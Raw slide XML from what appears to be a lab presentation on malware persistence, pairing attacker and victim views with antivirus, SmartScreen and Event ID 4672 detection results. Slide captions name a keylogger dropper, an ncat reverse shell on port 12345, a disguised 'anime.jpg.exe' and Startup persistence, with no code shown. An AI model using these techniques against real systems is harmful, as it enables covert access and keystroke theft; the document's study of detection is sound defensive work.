          <a:off x="914399" y="2559171"/>
          <a:ext cx="10363200" cy="338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16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2658-CC6E-ACFF-3F75-32FBAFC8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</p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistence Techniques – Experimental Steps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="320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04BC6-7305-03A1-781C-D2EA562C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2D04AFB-D827-47DA-9E84-D334808E83A6}" type="datetime1">
              <a:rPr lang="fr-FR"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>12/05/2025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4F219-277C-7574-C8A1-B1DA7667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D0C8DEC-6AC4-AF9D-B26E-300B59CD32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87126"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="914399" y="2559171"/>
          <a:ext cx="10363200" cy="338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71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BBC1-29B7-7263-FE9A-A01C9010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594" y="601407"/>
            <a:ext cx="10363200" cy="777893"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>View From Both Sides: Attacker Device</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="320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B1A00-C510-7E1A-465C-A04C2070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4D65541-F62D-4597-A550-FE647F3E55E0}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>5/12/2025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942CA-CC69-7203-BDB7-F819DE72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15A8FC-C466-17ED-DC83-BDD3EC133F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0" t="5504" r="1062" b="2273"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="950465" y="2239292"/>
            <a:ext cx="4201697" cy="2635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866F01-EA21-E943-A531-3E6BD10884B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846667" y="1530513"/>
            <a:ext cx="44756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chemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Connection to Victim Port Via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" err="1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ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1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 listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 1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9D280E-EFAB-0DE1-E06F-727CD0B6F0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639" t="-5135" r="3650" b="10541"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="678311" y="3431951"/>
            <a:ext cx="6924303" cy="22806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7D9B838-9DBD-F2C7-8E80-144AA4B4BF56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846666" y="3061025"/>
            <a:ext cx="32954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chemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Connected to Victim's Files:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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814DCA-7CC7-275E-1A57-A0EECE6DF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042" y="2240004"/>
            <a:ext cx="3728426" cy="24366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53F4E9-1160-8F8A-B6E7-FB4E35E07F67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8134512" y="1712871"/>
            <a:ext cx="303627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chemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Accessed to Victim Device:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390119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050B8-B84A-73E2-897F-8380D5FFD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BC69-DA21-F43F-BBEE-3BF28EC6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949" y="527665"/>
            <a:ext cx="10363200" cy="777893"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>View From Both Sides: Attacker Device</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="320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7DC61-E7A6-81E4-0686-0C0E635F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4D65541-F62D-4597-A550-FE647F3E55E0}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>5/12/2025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84054-0D01-55B2-88C9-66563440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D796D7-ECE1-5D3E-75D2-3BD8A523B92A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233333" y="1530513"/>
            <a:ext cx="4801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chemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Run the Hidden Command in the Image File</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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C73E7-114F-5E21-F567-9710BBC9A31A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142348" y="2698913"/>
            <a:ext cx="267807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err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> waiting on port 12345</a:t>
            </a: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chemeClr val="accent1">
                  <a:lumMod val="49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accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Python keylog.py sent via USB or script dropper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654939-B180-E36D-CD56-979F85D846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7" t="3269" r="81" b="-526"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4232427" y="5064685"/>
            <a:ext cx="7954715" cy="1204292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EF858A-F51D-57C3-ED68-2A9A670C1E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292" r="437" b="-2187"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4272225" y="2135289"/>
            <a:ext cx="5529805" cy="289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9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4880C-5C62-4334-9CB9-9805F160E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9270-E79D-7431-0AFC-9457442C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949" y="527665"/>
            <a:ext cx="10363200" cy="777893"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>View From Victim Device: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Backdoor Execution &amp; System Impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRP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2BC391D-029E-6C01-3987-76E43592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246" y="4056654"/>
            <a:ext cx="7966483" cy="2228087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D118E-EBBF-D3D1-8D02-C721C35C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4D65541-F62D-4597-A550-FE647F3E55E0}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>5/12/2025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C0BD4-CD7A-C790-8548-7520371E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9" name="Picture 8" descr="A computer screen shot of a rocket&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2139F0A9-A880-1226-3B4C-F79EA1C29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674" y="1683966"/>
            <a:ext cx="2095500" cy="1924050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9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FF4B127-3877-37AE-9C10-B334C2921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996" y="1730552"/>
            <a:ext cx="3443655" cy="19354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63F097-304F-8D0E-2D12-8FEA2F7B0FE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4157071" y="128617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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Application: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8D001F-171B-F407-9991-614E8C7EE6C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8066443" y="128617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accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>After Execution: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B2D93-9F40-3C20-B0D8-02D35BE8B667}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4157071" y="366671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err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>BackDoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1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7588AC-17EF-D0A7-1407-9AD6E1AC0C97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496529" y="2740933"/>
            <a:ext cx="317955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accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Payloads executed via Startup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr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accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse shell session active (visible in Wireshark)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Arrow: Slight curve with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47A851DF-E20F-BB56-6ABE-CA0CD63A97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2155" y="2209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7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8963-F253-D561-7E8D-E52814E6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631" y="642165"/>
            <a:ext cx="10363200" cy="575365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Experimental Resource Impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="320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4C8C8-3CEB-BBD7-D4D6-E3EC4C98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CA8D-5838-454B-83AC-6DA5B674C837}" type="datetime1">
              <a:rPr lang="fr-FR"/>
              <a:t>12/05/2025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F6D0A-2A24-B86A-B77D-25FA8914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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-U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721801-1373-5D9B-F6C5-967E8D53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88" y="1929423"/>
            <a:ext cx="3473124" cy="4428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20D684-761F-65F9-4684-1E3E8C491F55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308707" y="1415887"/>
            <a:ext cx="17597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1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Kaspersky </a:t>
            </a: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A3797F-E2FC-E812-E3FA-05B9618E2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513" y="1927795"/>
            <a:ext cx="3842564" cy="44156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BCEBD3-35FD-3EFE-D6CB-66CFE951B055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3942861" y="1415887"/>
            <a:ext cx="32837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1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="A screenshot of a graph&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5733A9A-4032-9F7D-4321-0C5809A24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440" y="1927510"/>
            <a:ext cx="4105275" cy="2390775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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1CD2CC54-E399-862A-7791-C4ADF2A24EA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7894372" y="1364996"/>
            <a:ext cx="1553859" cy="45953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000"/>
              </a:spcBef>
              <a:buSzPct val="87000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>BitDefender</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49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1076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9A28-35D0-93FA-BF36-62F184EF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86" y="536326"/>
            <a:ext cx="7623805" cy="586645"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis of Detection Effectiveness</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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6DF0D28-B099-3C4D-3D95-0599BCF63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961" y="2153048"/>
            <a:ext cx="3859397" cy="293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These readings were captured while all payloads (keylogger, batch script, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1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ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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) were active in the same session.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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</a:br>
            <a:r>
              <a:rPr lang="en-US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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49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This reflects cumulative cost for stealth persistence and live C2 access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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442A7-29C0-4F3F-929B-9B15E043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84E07E9-F443-4B42-81E3-7BD172DE7C1B}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>5/12/2025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04AB4-30F3-36B3-03D8-80ECCD4D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B13801A-225D-7A5D-5D90-58B9A0667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097648"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5738669" y="1189322"/>
          <a:ext cx="5983329" cy="4482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41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015D-A9C7-162B-C8F4-883234D8F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684" y="638383"/>
            <a:ext cx="10363200" cy="679570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Delivery Stage: Warning during download and execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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8A9E6-52BD-CC59-3FF6-177245E8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60DE-485B-46CD-8ED4-A306F3EA1E04}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:t>5/12/2025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5F8CB-70D3-C2B6-3F01-CB10F4F6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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A computer screen shot of a blue square&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD3659B-3921-8B6E-E97B-2BFEEAC3F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210" y="2207908"/>
            <a:ext cx="5897101" cy="3790707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C16BD7-BDCE-6387-BA04-3329B41D844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045" t="680" r="29273" b="-340"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="449163" y="2208170"/>
            <a:ext cx="5203702" cy="3821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A08A15-D16D-D543-CD66-CED0D13484A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095999" y="1439334"/>
            <a:ext cx="6084277" cy="665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Windows SmartScreen warning triggered </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB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by unknown </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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B2C37E-89D7-5055-0891-F379292E0B55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449384" y="1439333"/>
            <a:ext cx="54069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Chrome flagged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Grandview Display"/>
              </a:rPr>
              <a:t>anime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>.jpg.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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 as malware, blocked download attempt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="4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8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88FD-FD1F-A006-300F-49B2785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>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>System Privileges and Risk Visibility (Event ID 4672)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Content Placeholder 1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A90F64-C436-9652-DBA2-F626D2F9F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-1" b="34265"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183188" y="987425"/>
            <a:ext cx="6172200" cy="4873625"/>
          </a:xfrm>
          <a:noFill/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10FFD173-A1CE-FA19-33D0-8CEE730C6597}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="912628" y="2934586"/>
            <a:ext cx="3859397" cy="29344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SzPct val="87000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Logon with SYSTEM privileges granted full access to persistence and payload execution — flagged by Event</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49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SzPct val="87000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600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Granting access to protected areas without detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ID 4672</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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4AE2-F3D7-E792-E4B3-E73C2983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880E83-958B-485F-A498-DC028DBC4F04}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>5/12/2025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7F041-C9C1-00D5-F07F-20B2D98A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1DD0E4A-18CC-E85B-07BB-739C062C25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3030" r="12572" b="3463"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="697302" y="4706608"/>
            <a:ext cx="10659246" cy="1650177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphic 4" descr="Arrow: Rotate right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AFE2964-5675-ABEB-5620-79F0108C3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7813376" y="3233191"/>
            <a:ext cx="1482305" cy="14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41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167E9-38AB-C6E5-C112-7FB3A6836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1B61-DEF5-3D80-ED4A-EF5968827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15" y="1752123"/>
            <a:ext cx="3536694" cy="24503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>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Network traffic (outbound/inbound connections): Wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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6DAE1-3E4A-7114-C198-DA5EDE22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D4CA8D-5838-454B-83AC-6DA5B674C837}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>5/12/2025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5C147-EC84-8FA9-4091-38F964CF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9A814C-A38E-A31C-F990-D446187150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" t="-936" r="46876" b="37942"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4182806" y="516982"/>
            <a:ext cx="8047282" cy="5135304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8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0AB48BAA-4419-CAAA-FB90-D6B0366E04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9760" b="-870"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4179602" y="5400756"/>
            <a:ext cx="7773053" cy="954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4DC2A6-FF5F-CD7E-DB82-89975DCFF9C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651281" y="539681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accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP Packets:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248169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B55E4E0-CD7D-44BB-50FB-082CCD615656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Outline</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8000" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49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0DF8D-DC33-2F50-B77E-5B157E55E05F}"/>
              </a:ext>
            </a:extLst>
